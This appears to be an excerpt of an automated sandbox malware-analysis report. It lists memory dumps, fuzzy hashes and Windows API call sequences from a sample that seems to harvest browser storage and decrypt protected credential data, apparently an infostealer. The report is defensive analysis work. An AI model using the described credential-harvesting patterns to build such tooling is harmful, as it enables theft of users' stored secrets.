                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: e11424d2fb01ecaed0eb902abcabacd831fc69bf10d787904691d134305298ba
                          • Instruction ID: b9713385dfbbf0f1fae2f698b62689d6732228bb1e162fbf386319eca986f083
                          • Opcode Fuzzy Hash: e11424d2fb01ecaed0eb902abcabacd831fc69bf10d787904691d134305298ba
                          • Instruction Fuzzy Hash: 7D011DB5E4120AABE710DBA4DC45FABB778EB48B00F104555EA05AB381D7B4AA018BE5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: fm}}
                          • API String ID: 0-3408078218
                          • Opcode ID: 2994352708fe4c39ae78e543721fc117ff220bd32ef056dd91a2d5881eef9d8c
                          • Instruction ID: 937a85c5c30b84efa3f15a8bd2a2f802da72029072fe8a34119e16f68c615203
                          • Opcode Fuzzy Hash: 2994352708fe4c39ae78e543721fc117ff220bd32ef056dd91a2d5881eef9d8c
                          • Instruction Fuzzy Hash: 434103F3A182005BF3089E38EC8577B77D6EBE4720F1A853DEAC5C7784E93958058656
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0504fc42c6c94dc4fbe9241523582fe1d04cb9f58496944824d2de76a6a226dc
                          • Instruction ID: 5c13bc5c627cf033aa430f865b3b7928e8ee022925d3528279d45559cf80b42d
                          • Opcode Fuzzy Hash: 0504fc42c6c94dc4fbe9241523582fe1d04cb9f58496944824d2de76a6a226dc
                          • Instruction Fuzzy Hash: 325127F3E085005BF3189A28DC9A77BB696EBD0320F1AC53DEA85977C5E83D580582D2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a5cc92954bec45fbf46a4151b53964f39978d53e04602d2580ddde2d59b0247
                          • Instruction ID: d09c6ac8b5ef4d373b093df7a8f99d9fb6935f1395ad3786a763d3ab7f6b0ac2
                          • Opcode Fuzzy Hash: 9a5cc92954bec45fbf46a4151b53964f39978d53e04602d2580ddde2d59b0247
                          • Instruction Fuzzy Hash: 8741ADB3A086109FE714AE6DDC8576AF7E6EF98320F16893DDAC8D3344E63458018686
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 04938b91152fe48cf4aa1b0d4a200497c0b81b8cc660d523fff78182a2eb491c
                          • Instruction ID: d3d62b8aa7a071fefd00aed62541b22256898fa506b00a637a30a6d829e95ecd
                          • Opcode Fuzzy Hash: 04938b91152fe48cf4aa1b0d4a200497c0b81b8cc660d523fff78182a2eb491c
                          • Instruction Fuzzy Hash: 244182B39086148FF304AE25DC8573AF7E6EF94320F17493CDAC487290DA7958418B97
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E8636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 007E86AA
                          • StrStrA.SHLWAPI(?,0125E1A8), ref: 007E86CF
                          • lstrcpyn.KERNEL32(00A093D0,?,00000000), ref: 007E86EE
                          • lstrlen.KERNEL32(?), ref: 007E8701
                          • wsprintfA.USER32 ref: 007E8711
                          • lstrcpy.KERNEL32(?,?), ref: 007E8727
                          • StrStrA.SHLWAPI(?,0125E1C0), ref: 007E8754
                          • lstrcpy.KERNEL32(?,00A093D0), ref: 007E87B4
                          • StrStrA.SHLWAPI(?,0125E1D8), ref: 007E87E1
                          • lstrcpyn.KERNEL32(00A093D0,?,00000000), ref: 007E8800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: 23ede9c9adb33c623316abd8c8689e112efe7e62a166a15f7dcf5d921da5eb87
                          • Instruction ID: 91b1ea9cb3c9f5abe96a93a7dfde0ca9411411a6cb08c6d94c8db5582002f1a0
                          • Opcode Fuzzy Hash: 23ede9c9adb33c623316abd8c8689e112efe7e62a166a15f7dcf5d921da5eb87
                          • Instruction Fuzzy Hash: 3EF17E71901119EFDB10DBB4DD48AAB77B9EF88300F104599E949E7251DF38AE02CBA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1F9F
                          • lstrlen.KERNEL32(01259298), ref: 007D1FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 007D1FE3
                          • lstrlen.KERNEL32(00801794), ref: 007D1FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D200E
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D2042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D204D
                          • lstrlen.KERNEL32(00801794), ref: 007D2058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2075
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D2081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D20AC
                          • lstrlen.KERNEL32(?), ref: 007D20E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2104
                          • lstrcat.KERNEL32(00000000,?), ref: 007D2112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2139
                          • lstrlen.KERNEL32(00801794), ref: 007D214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D216B
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D2177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D21A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D21D4
                          • lstrlen.KERNEL32(?), ref: 007D21EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D220A
                          • lstrcat.KERNEL32(00000000,?), ref: 007D2218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2242
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D227F
                          • lstrlen.KERNEL32(0125D580), ref: 007D228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D22B1
                          • lstrcat.KERNEL32(00000000,0125D580), ref: 007D22B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D22F7
                          • lstrcat.KERNEL32(00000000), ref: 007D2304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007D2356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D23BF
                          • DeleteFileA.KERNEL32(00000000), ref: 007D23F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007D2444
                          • FindClose.KERNEL32(00000000), ref: 007D2453
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: 5247a5d2bc165a99382f357404d2a44116c68f6571861a81de1e9f22a3aab2b3
                          • Instruction ID: 8cd542dcf459aefe899cd4bdf2e9dce405d15bb56a3ad495c58a10d575e52a2d
                          • Opcode Fuzzy Hash: 5247a5d2bc165a99382f357404d2a44116c68f6571861a81de1e9f22a3aab2b3
                          • Instruction Fuzzy Hash: 65E14371A1121ADBCB21EFA4DD49A9E77B9EF64300F049126F805A7352DB3CDD078B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6445
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007E64AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E64E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: 9814d9e16748deec3a98040a6e6217784a6694f7afaf6491d426f4472520f408
                          • Instruction ID: 63cf2e4f50fde46500b88534a00e9cc9c854054e7a8e00daa8a15d39c07ec743
                          • Opcode Fuzzy Hash: 9814d9e16748deec3a98040a6e6217784a6694f7afaf6491d426f4472520f408
                          • Instruction Fuzzy Hash: CFF1B170A122599BCB21EF65D849AAF77B8AF68340F048129F855E7352DB3CDD43CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E43A3
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E43D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E43FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4409
                          • lstrlen.KERNEL32(\storage\default\), ref: 007E4414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 007E443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4498
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E44D7
                          • lstrcat.KERNEL32(00000000,?), ref: 007E44DF
                          • lstrlen.KERNEL32(00801794), ref: 007E44EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4507
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E4513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 007E451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 007E4547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E45A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007E45A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4601
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4653
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E467B
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E46AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: 33e88db1061f06ef8b873ba9e946dd619771992678a6d0d8f705e54b690d72e1
                          • Instruction ID: 0757ab797b301ef843929a3ba19a277c73b6e47e4af6583370ff34e9a4e631de
                          • Opcode Fuzzy Hash: 33e88db1061f06ef8b873ba9e946dd619771992678a6d0d8f705e54b690d72e1
                          • Instruction Fuzzy Hash: ABB15E71A1225A9BCB21EFB5DD4DA6F77B8AF58300F045125B845E7352DB38ED038B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E57D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007E5804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E5868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E58C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E58D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E58F8
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E5961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5988
                          • lstrlen.KERNEL32(00801794), ref: 007E599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E59B9
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E59C5
                          • lstrlen.KERNEL32(0125D6A0), ref: 007E59D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E59F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E5A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007E5A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5BB5
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E5BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
